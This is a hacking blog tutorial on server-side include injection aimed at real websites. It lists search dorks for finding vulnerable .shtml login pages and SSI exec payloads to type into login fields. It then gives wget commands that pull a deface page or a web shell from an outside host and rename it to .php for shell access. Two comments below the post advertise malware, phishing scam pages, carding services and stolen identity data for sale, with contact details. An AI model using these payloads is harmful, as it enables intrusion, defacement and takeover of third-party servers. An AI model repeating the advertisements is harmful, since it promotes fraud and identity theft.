» » ssi server side include injection shell

A+ A-
hii
H4CK3R $P1D3R was here
today i will teach you SSI (server side include)

 SSI (server side include) is a web application exploit, you can put your codes remotly to vulenrable websites,
Server-side Include allowed you to upload files in multi extentions, but in .php extention you can't excute your shell, you have to rename shell.txt to shell.php
Lets Begin ...

Dorks :


inurl:bin/Cklb/
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=




Try any dork or find sites manually,
To check vulenrablity of websites enter these commands in username and password

<!--#echo var="DATE_LOCAL" -->


it Will show the Date


<!--#exec cmd="whoami"-->


it Will display which user is running on the server


<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> (Linux)


it Will show all files in the directory


<!-- #exec cmd="dir" --> (Windows)


it Will display all files in the directory


[Image: 0.png]





for example enter


<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>


in username and password to view all files of website


now we have to upload our deface page or shell
to upload a deface page, host/upload your deface page anywhere
you can use pastehtml.com for it,
then enter this command in username and password

<!--#exec cmd="wget http://website.com/deface.html" -->


to view your deface page goto site.com/deface.html

to upload a shell on website you have to host your shell anywhere in .txt format
then enter this command in login


<!--#exec cmd="wget http://website.com/abc.txt" -->


to check your txt file is uploaded or not list all files using


<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>


now you have to chnage .txt extention to .php
to rename your txt file to php use this command

<!--#exec cmd="mv abc.txt abc.php" -->


now goto site.com/abc.php and acess your shell.
15:38

Post a Comment

  1. Anonymous15 October 2019 at 14:29

    Hello world
    I teach hacking andriod apk virus - windows Hacking - web server hacking -
    Reseller :- Hacking Tools & Hacking services, Also Teach Hacking Methods Via teem weaver or Anydesk,
    Each Method Take minimum 1 hour to learn with vedio Tutorial And Hacking Tools ,

    How to Make Money hacking tools,

    - Spamming & Tools ,
    - Carding & Tools ,
    - Virus with control panal and Spy bot files,
    - Virus With Builder And Crypter ,
    - Scanners with Bruters ,
    - Crypters with Doc Exploits ,pdf Exploits ,TExtfile Exploits ,
    - PHP Exploits with shell and mailer
    - OTP verications Bypass with Bulletproof Scam-page and Otp control
    - Company Ceo or cfo leads Any country
    - Rat virus with builder
    - Cookies Stealers and Builder
    - keyloger and builder
    - Credit card Scam-pages
    - Bank login Scam-pages
    - debit card topup scam page
    - donation scam-page
    - dhl login and tracking scam-page
    - fedax login and tracking scam-page
    - Shipping Tools

    Place & Ground
    learners you will pay cheap $ for demo Tools & Method

    Business grounds

    Credit card Low Interest Services,

    - Credit card with Fullz Information - Minimum Investment 150$ - With 50k Credit limit And balance
    - Debit Card Topup AS per Card limit - Minimum Investment 200$ - With 8000$ balance
    - Dating scam Fresh male female Logins - Minimum Investment 80$ - Dating Login upto 30

    -----------------
    ABOUT US :
    Icq :-675452902
    Skype: rushr00t000
    email me:- hackitbackd00r@gmail.com

    ReplyDelete
  2. Anonymous23 November 2021 at 18:19


    FRESH&VALID SPAMMED USA DATABASE/FULLZ/LEADS

    ****Contact****
    *ICQ :748957107
    *Gmail : darkiris911@gmail.com
    *Telegram :@James307
    *Skype : Jamesvince$
    <><><><><><><>
    USA SSN FULLZ WITH ALL PERSONAL DATA+DL NUMBER
    -FULLZ FOR PUA & SBA
    -FULLZ FOR TAX REFUND
    $2 for each fullz/lead with DL num
    $1 for each SSN+DOB
    $5 for each with Premium info
    ID's Photos For any state (back & front)
    (Price can be negotiable if order in bulk)
    <><><><><><><><><><><>
    +High quality and connectivity
    +If you have any trust issue before any deal you may get few to test
    +Every leads are well checked and available 24 hours
    +Fully cooperate with clients
    +Any invalid info found will be replaced
    +Payment Method(BTC,USDT,ETH,LTC & PAYPAL)
    +Fullz available according to demand too i.e (format,specific state,specific zip code & specifc name etc..)
    <><><><><><><><><><>
    +US cc Fullz
    +(Dead Fullz)
    +(Email leads with Password)
    +(Dumps track 1 & 2 with pin and without pin)
    +Hacking & Carding Tutorials
    +Smtp Linux
    +Safe Sock
    +Server I.P's
    +HQ Emails with passwords
    <><><><><><><><>
    *Let's do a long term business with good profit
    *Contact for more details & deal

    ****Contact****
    *ICQ :748957107
    *Gmail: darkiris911@gmail.com
    *Telegram :@James307
    *Skype : Jamesvince$

    ReplyDelete

Subscribe to: Post Comments (Atom)
 
Top